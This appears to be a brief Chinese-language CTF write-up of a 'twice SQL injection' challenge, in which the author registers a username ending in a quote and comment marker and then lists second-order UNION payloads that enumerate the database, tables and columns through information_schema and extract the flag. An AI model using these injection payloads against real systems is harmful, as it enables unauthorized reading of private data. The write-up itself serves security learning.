这个都说twice sql injection了,就尝试二次注入
注册一个账号登录以后有一个改个人简介的地方
我注册用户名 2’# 他这个主页就没有那个没有简介的字
为啥呢,,,,我就猜,我想这里简介显示的sql语句是这样的
select jianjei from table where username=‘’
然后呢,这里我刚刚注册的用户名是2’#,那这个语句就变成
select jianjei from table where username=‘2’#
那搜索的地方变成用户为2的时候了,我没有注册用户为2的号,所以他这里不回显,我甚至觉得这个漏洞可以搜到别人的简介,那这里首先可以考虑联合查询注入
爆数据库
2' union select database()#
爆表
2' union select group_concat(table_name)from information_schema.tables where table_schema=database()#
爆字段
1' union select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='flag'#
1' union select group_concat(flag) from flag#
拿到flag